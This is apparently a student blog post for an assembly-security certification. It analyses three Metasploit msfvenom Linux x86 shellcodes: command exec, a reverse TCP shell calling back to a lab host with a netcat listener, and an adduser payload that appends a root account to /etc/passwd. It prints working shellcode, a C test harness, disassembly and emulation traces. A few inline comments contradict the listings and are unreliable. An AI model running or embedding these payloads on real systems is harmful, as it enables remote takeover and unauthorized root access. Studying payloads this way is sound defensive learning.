Msfvenom shellcode analysis
This blog post provides an analysis of various common shellcodes generated by the msfvenom utility which is part of Metasploit.
- # Shellcode analysis #1: linux/x86/exec
- Stepping through the shellcode
- # Shellcode analysis #2: linux/x86/shell_reverse_tcp
- Stepping through the shellcode
- # Shellcode analysis #3: linux/x86/adduser
- Stepping through the shellcode
Shellcode analysis #1: linux/x86/exec
The linux/x86/exec msfvenom payload simply executes an arbitrary program configured with the CMD parameter.
The payload for this analysis was generated as follows:
slemire@slae:~/slae32/assignment5/1_exec$ msfvenom -p linux/x86/exec -f c -o exec_shellcode CMD=/usr/bin/id
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 47 bytes
Final size of c file: 224 bytes
Saved as: exec_shellcode
Next, it was added to the skeleton test C program that was used for the other assignments.
#include <stdio.h>
char shellcode[] = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x0c\x00\x00\x00\x2f"
"\x75\x73\x72\x2f\x62\x69\x6e\x2f\x69\x64\x00\x57\x53\x89\xe1"
"\xcd\x80";
int main()
{
int (*ret)() = (int(*)())shellcode;
printf("Size: %d bytes.\n", sizeof(shellcode));
ret();
}
The shellcode is compiled with the -z execstack flag to make the stack executable then tested to make sure it works:
slemire@slae:~/slae32/assignment5/1_exec$ gcc -z execstack -o shellcode shellcode.c
slemire@slae:~/slae32/assignment5/1_exec$ ./shellcode
Size: 48 bytes.
uid=1000(slemire) gid=1000(slemire) groups=1000(slemire),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
The sctest program from libemu2 can be used to emulate the specific instructions in the shellcode and help understand how the shellcode works. As show in the output below, we can clearly see that the shellcode executes the execve function, using /bin/sh as the program name. The command /usr/bin/id that was configured in the payload through msfvenom is executed using the -c command flag of /bin/sh.
slemire@slae:~/slae32/assignment5/1_exec$ msfvenom -p linux/x86/exec CMD=/usr/bin/id | sctest -v -Ss 100000
verbose = 1
[...]
execve
int execve (const char *dateiname=00416fc0={/bin/sh}, const char * argv[], const char *envp[]);
cpu error error accessing 0x00000004 not mapped
stepcount 15
int execve (
const char * dateiname = 0x00416fc0 =>
= "/bin/sh";
const char * argv[] = [
= 0x00416fb0 =>
= 0x00416fc0 =>
= "/bin/sh";
= 0x00416fb4 =>
= 0x00416fc8 =>
= "-c";
= 0x00416fb8 =>
= 0x0041701d =>
= "/usr/bin/id";
= 0x00000000 =>
none;
];
const char * envp[] = 0x00000000 =>
none;
) = 0;
ndisasm is used to decode the instructions from the shellcode:
slemire@slae:~/slae32/assignment5/1_exec$ msfvenom -p linux/x86/exec CMD=/usr/bin/id | ndisasm -b 32 -
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 47 bytes
00000000 6A0B push byte +0xb
00000002 58 pop eax
00000003 99 cdq
00000004 52 push edx
00000005 66682D63 push word 0x632d
00000009 89E7 mov edi,esp
0000000B 682F736800 push dword 0x68732f
00000010 682F62696E push dword 0x6e69622f
00000015 89E3 mov ebx,esp
00000017 52 push edx
00000018 E80C000000 call dword 0x29
0000001D 2F das
0000001E 7573 jnz 0x93
00000020 722F jc 0x51
00000022 62696E bound ebp,[ecx+0x6e]
00000025 2F das
00000026 696400575389E1CD imul esp,[eax+eax+0x57],dword 0xcde18953
0000002E 80 db 0x80
Stepping through the shellcode
The syscall for execve is 0xb and needs to be placed into the $eax register before calling int 0x80. It could be done with mov eax, 0xb but this uses a longer shellcode, so instead the push and pop instructions are used to place the 0xb in the $eax register.
push byte +0xb ; top of stack = 0xb
pop eax ; eax -> 0xb
The $edx register will be set to null since we don’t need to pass any environment variables to the program that is executed. Using the cdq instruction is a little trick to further reduce the shellcode size. It extends the sign bit of the $eax register (which is not set since its value is 0xb) into the $edx register, effectively changing it to zero.
cdq ; edx -> 0
push edx ;
The address of the the 2nd argument -c is moved into $edi. This’ll be used later when pushing the arguments on the stack.
push word 0x632d ; const char * argv[] -> "-c"
mov edi,esp ;
The first argument const char *filename contains a pointer to the filename that’ll be executed. The /bin/sh is pushed on the stack, then the $esp value is copied to $ebx so it’ll be used for the execve syscall.
push dword 0x68732f ; /bin/sh
push dword 0x6e69622f ; [...]
mov ebx,esp ; const char *filename -> "/bin/sh"
push edx
The call instruction first places the address of /usr/bin/id on the stack then jumps to the instructions following the null byte below.
E80C000000 call dword 0x29 ; push on the stack the address of string "/usr/bin/id"
2F das ; /usr/bin/id
7573 jnz 0x93 ; [...]
722F jc 0x51 ; [...]
62696E bound ebp,[ecx+0x6e] ; [...]
2F das ; [...]
696400575389E1CD imul esp,[eax+eax+0x57],dword 0xcde18953 ; [...]
After the call instruction, gdb shows that the next instructions push the argv[] in the reverse order:
$eax : 0xb
$ebx : 0xbffff59e → "/bin/sh"
$ecx : 0x7ffffff7
$edx : 0x0
$esp : 0xbffff596 → 0x0804a05d → "/usr/bin/id"
$ebp : 0xbffff5c8 → 0x00000000
$esi : 0xb7fcc000 → 0x001b1db0
$edi : 0xbffff5a6 → 0x0000632d ("-c"?)
[...]
0xbffff596│+0x0000: 0x0804a05d → "/usr/bin/id" ← $esp
0xbffff59a│+0x0004: 0x00000000
0xbffff59e│+0x0008: "/bin/sh"
0xbffff5a2│+0x000c: 0x0068732f ("/sh"?)
0xbffff5a6│+0x0010: 0x0000632d ("-c"?)
0xbffff5aa│+0x0014: 0x843a0000
0xbffff5ae│+0x0018: 0x00010804
0xbffff5b2│+0x001c: 0xf6740000
───────────────────────────────────────────────────────── code:x86:32 ────
→ 0x804a069 <shellcode+41> push edi
0x804a06a <shellcode+42> push ebx
0x804a06b <shellcode+43> mov ecx, esp
0x804a06d <shellcode+45> int 0x80
After the push, the stack looks like this:
0xbffff58e│+0x0000: 0xbffff59e → "/bin/sh" ← $esp
0xbffff592│+0x0004: 0xbffff5a6 → 0x0000632d ("-c"?)
0xbffff596│+0x0008: 0x0804a05d → "/usr/bin/id"
The argv[] now contains : ["/bin/sh", "-c", "/usr/bin/id"] and the $ecx register contains the memory adress of this array.
Finally, execve is called using the int 0x80 instruction.
Shellcode analysis #2: linux/x86/shell_reverse_tcp
The linux/x86/shell_reverse_tcp msfvenom payload connects back to a remote machine, executes a shell and redirects output to the socket. This type of payload is commonly used when a firewall restrict incoming connections but allow outbound connections.
The payload for this analysis was generated as follows:
slemire@slae:~/slae32/assignment5/2_shell_reverse_tcp$ msfvenom -p linux/x86/shell_reverse_tcp -f c -o shell_reverse_tcp_shellcode LHOST=172.23.10.37 LPORT=4444
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Final size of c file: 311 bytes
Saved as: shell_reverse_tcp_shellcode
Compiling and verifying that the shellcode works:
slemire@slae:~/slae32/assignment5/2_shell_reverse_tcp$ gcc -z execstack -o shellcode shellcode.c
slemire@slae:~/slae32/assignment5/2_shell_reverse_tcp$ ./shellcode
Size: 69 bytes.
[...]
slemire@slae:~$ nc -lvnp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [172.23.10.37] port 4444 [tcp/*] accepted (family 2, sport 53684)
id
uid=1000(slemire) gid=1000(slemire) groups=1000(slemire),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
With libemu’s sctest utility, we can see that the shellcode executes the following functions:
- socket
- dup2 (duplicate stdin, stdout and stderr descriptors)
- connect
- execve
slemire@slae:~/slae32/assignment5/2_shell_reverse_tcp$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=172.23.10.37 LPORT=4444 | sctest -v -Ss 100000
verbose = 1
[...]
int socket (
int domain = 2;
int type = 1;
int protocol = 0;
) = 14;
int dup2 (
int oldfd = 14;
int newfd = 2;
) = 2;
int dup2 (
int oldfd = 14;
int newfd = 1;
) = 1;
int dup2 (
int oldfd = 14;
int newfd = 0;
) = 0;
int connect (
int sockfd = 14;
struct sockaddr_in * serv_addr = 0x00416fbe =>
struct = {
short sin_family = 2;
unsigned short sin_port = 23569 (port=4444);
struct in_addr sin_addr = {
unsigned long s_addr = 621418412 (host=172.23.10.37);
};
char sin_zero = " ";
};
int addrlen = 102;
) = 0;
int execve (
const char * dateiname = 0x00416fa6 =>
= "//bin/sh";
const char * argv[] = [
= 0x00416f9e =>
= 0x00416fa6 =>
= "//bin/sh";
= 0x00000000 =>
none;
];
const char * envp[] = 0x00000000 =>
none;
) = 0;
With ndisasm, we can disassemble the shellcode produced by msfvenom:
slemire@slae:~/slae32/assignment5/2_shell_reverse_tcp$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=172.23.10.37 LPORT=4444 | ndisasm -b32 - > shell_reverse_tcp.asm
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
slemire@slae:~/slae32/assignment5/2_shell_reverse_tcp$ cat shell_reverse_tcp.asm
00000000 31DB xor ebx,ebx
00000002 F7E3 mul ebx
00000004 53 push ebx
00000005 43 inc ebx
00000006 53 push ebx
00000007 6A02 push byte +0x2
00000009 89E1 mov ecx,esp
0000000B B066 mov al,0x66
0000000D CD80 int 0x80
0000000F 93 xchg eax,ebx
00000010 59 pop ecx
00000011 B03F mov al,0x3f
00000013 CD80 int 0x80
00000015 49 dec ecx
00000016 79F9 jns 0x11
00000018 68AC170A25 push dword 0x250a17ac
0000001D 680200115C push dword 0x5c110002
00000022 89E1 mov ecx,esp
00000024 B066 mov al,0x66
00000026 50 push eax
00000027 51 push ecx
00000028 53 push ebx
00000029 B303 mov bl,0x3
0000002B 89E1 mov ecx,esp
0000002D CD80 int 0x80
0000002F 52 push edx
00000030 686E2F7368 push dword 0x68732f6e
00000035 682F2F6269 push dword 0x69622f2f
0000003A 89E3 mov ebx,esp
0000003C 52 push edx
0000003D 53 push ebx
0000003E 89E1 mov ecx,esp
00000040 B00B mov al,0xb
00000042 CD80 int 0x80
Stepping through the shellcode
First, registers are cleared. The mul instruction is a shortcut to zero out eax and edx with a single instruction.
xor ebx,ebx ; ebx = 0
mul ebx ; eax = 0, edx = 0
int socket(int domain, int type, int protocol);
The socket is created:
- AF_INET = IP
- SOCK_STREAM = tcp
inc ebx ; ebx = 1 (SYS_SOCKET)
push ebx ; socket() -> type = 1 (SOCK_STREAM)
push byte +0x2 ; socket() -> domain = 2 (AF_INET)
mov ecx,esp ; socketcall() -> *args
mov al,0x66 ; sys_socketcall -> SYS_SOCKET
int 0x80
int dup2(int oldfd, int newfd)
stdin, stdout and stderr are duplicated to the network socket:
xchg eax,ebx ; eax = 1, ebx = 3 (fd)
pop ecx ; ecx = 2
mov al,0x3f ; sys_dup2
int 0x80 ;
dec ecx ;
jns 0x11 ; loop through stdin, stdout, stderr
int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen)
The socket is then connected to the remote listener 172.23.10.37 / 4444:
push dword 0x250a17ac ; IP: 172.23.10.38
push dword 0x5c110002 ; Port: 4444
mov ecx,esp ; socketcall() -> *args
mov al,0x66 ; sys_socketcall -> SYS_CONNECT
push eax ; socklen_t addrlen = 66
push ecx ; const struct sockaddr *addr
push ebx ; int sockfd = 3 (fd)
mov bl,0x3 ; ebx = 3 (SYS_CONNECT)
mov ecx,esp ; socketcall() -> *args
int 0x80
int execve(const char *filename, char *const argv[], char *const envp[])
Once the socket is connected, execve is used to spawn a shell and since the descriptors have previously been duplicated the input and output will be redirected over the network.
push edx ; edx = 0
push dword 0x68732f6e ; //bin/sh
push dword 0x69622f2f ; [...]
mov ebx,esp ; const char *filename -> /bin/sh
push edx ;
push ebx ;
mov ecx,esp ; char *const argv[] -> /bin/sh
mov al,0xb ; sys_execve
int 0x80
Shellcode analysis #3: linux/x86/adduser
The linux/x86/adduser shellcode adds a new user to /etc/passwd with an arbitrary username and password. The password is encoded in traditional descrypt format directly in the file instead of /etc/shadow.
Creating the shellcode
slemire@slae:~/slae32/assignment5/3_adduser$ msfvenom -p linux/x86/adduser -f c -o adduser_shellcode USER=slae PASS=slae
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 91 bytes
Final size of c file: 409 bytes
Saved as: adduser_shellcode
Verifying that the shellcode works by adding a user slae with password slae
slemire@slae:~/slae32/assignment5/3_adduser$ gcc -z execstack -o shellcode shellcode.c
slemire@slae:~/slae32/assignment5/3_adduser$ sudo ./shellcode
[sudo] password for slemire:
Size: 92 bytes.
slemire@slae:~/slae32/assignment5/3_adduser$ grep slae /etc/passwd
slae:AzH43ypX/zepc:0:0::/:/bin/sh
ndisasm is used to dissassemble the shellcode:
slemire@slae:~/slae32/assignment5/3_adduser$ msfvenom -p linux/x86/adduser USER=slae PASS=slae | ndisasm -b32 -
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 91 bytes
00000000 31C9 xor ecx,ecx
00000002 89CB mov ebx,ecx
00000004 6A46 push byte +0x46
00000006 58 pop eax
00000007 CD80 int 0x80
00000009 6A05 push byte +0x5
0000000B 58 pop eax
0000000C 31C9 xor ecx,ecx
0000000E 51 push ecx
0000000F 6873737764 push dword 0x64777373
00000014 682F2F7061 push dword 0x61702f2f
00000019 682F657463 push dword 0x6374652f
0000001E 89E3 mov ebx,esp
00000020 41 inc ecx
00000021 B504 mov ch,0x4
00000023 CD80 int 0x80
00000025 93 xchg eax,ebx
00000026 E822000000 call dword 0x4d
0000002B 736C jnc 0x99 -> Start of username/password string
0000002D 61 popad ..
0000002E 653A417A cmp al,[gs:ecx+0x7a] ..
00000032 48 dec eax
00000033 3433 xor al,0x33
00000035 7970 jns 0xa7
00000037 58 pop eax
00000038 2F das
00000039 7A65 jpe 0xa0
0000003B 7063 jo 0xa0
0000003D 3A30 cmp dh,[eax]
0000003F 3A30 cmp dh,[eax]
00000041 3A3A cmp bh,[edx]
00000043 2F das
00000044 3A2F cmp ch,[edi]
00000046 62696E bound ebp,[ecx+0x6e]
00000049 2F das
0000004A 7368 jnc 0xb4
0000004C 0A598B or bl,[ecx-0x75]
0000004F 51 push ecx
00000050 FC cld
00000051 6A04 push byte +0x4
00000053 58 pop eax
00000054 CD80 int 0x80
00000056 6A01 push byte +0x1
00000058 58 pop eax
00000059 CD80 int 0x80
Stepping through the shellcode
int setreuid(uid_t ruid, uid_t euid)
setreuid() can be used by daemon processes to change the identity of a process in order for the process to be used to run work on behalf of a user.
The setreuid function is called so the program executes as root (of course, the user or process executing the shellcode must have privileges to do so). This is often used when the process itself doesn’t run as root but has privileges to do, for example if the SUID bit is set on the file.
xor ecx,ecx ; ecx = 0
mov ebx,ecx ; ebx = 0
push byte +0x46 ; eax = 0x46 -> sys_setreuid16
pop eax
int 0x80
int open(const char *pathname, int flags)
A file descriptor is then created so the shellcode can write the new user into /etc/passwd. The open function expects a pointer to the filename /etc/passwd and the flags. The filename contains extra slashes so make it 4 bytes aligned. The extra slashes in the filename don’t change the behavior as Linux don’t care of there is a single slash or multiple ones.
Flags specify if the file should be opened as read-only, write-only, etc.
The list of flags is in the fnctl.h file:
#define O_ACCMODE 00000003
#define O_RDONLY 00000000
#define O_WRONLY 00000001
#define O_RDWR 00000002
#define O_CREAT 00000100
#define O_EXCL 00000200
#define O_NOCTTY 00000400
#define O_TRUNC 00001000
#define O_APPEND 00002000
...
These values are encoded in octal base, so when we look at the disassembled code below for the open function, we see that the $ecx register contains the value 0x401 which translates to 2001 in octal base. Therefore the O_WRONLY and O_APPEND flags are used on /etc/passwd.
push byte +0x5 ; eax = 0x5 -> sys_open
pop eax
xor ecx,ecx ; ecx = 0
push ecx ; null-terminate pathname string
push dword 0x64777373 ; /etc//passwd
push dword 0x61702f2f ; [...]
push dword 0x6374652f ; [...]
mov ebx,esp ; const char *pathname -> /etc//passwd
inc ecx ; ecx = 0x1
mov ch,0x4 ; ecx = 0x401, int flags -> O_TRUNC + O_WRONLY
int 0x80
The next bit of code pushes on the stack the memory address of new /etc/passwd line that’ll get added. Then the code jumps further down in the code.
xchg eax,ebx ; eax = */etc//passwd, ebx = 3
call dword 0x4d ; put username entry on the stack
The code lands here, where the write function is called to add the username into the file.
write(int fd, const void *buf, size_t count)
pop ecx ; username entry: slae:AzH43ypX/zepc...
mov edx, DWORD PTR [ecx-0x4] ; len
push 0x4 ; eax = 0x4 -> sys_write
pop eax
int 0x80
Then finally, the program exits:
push 0x1 ; eax = 0x1 -> sys_exit
pop eax
int 0x80
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1236
All source files can be found on GitHub at https://github.com/slemire/slae32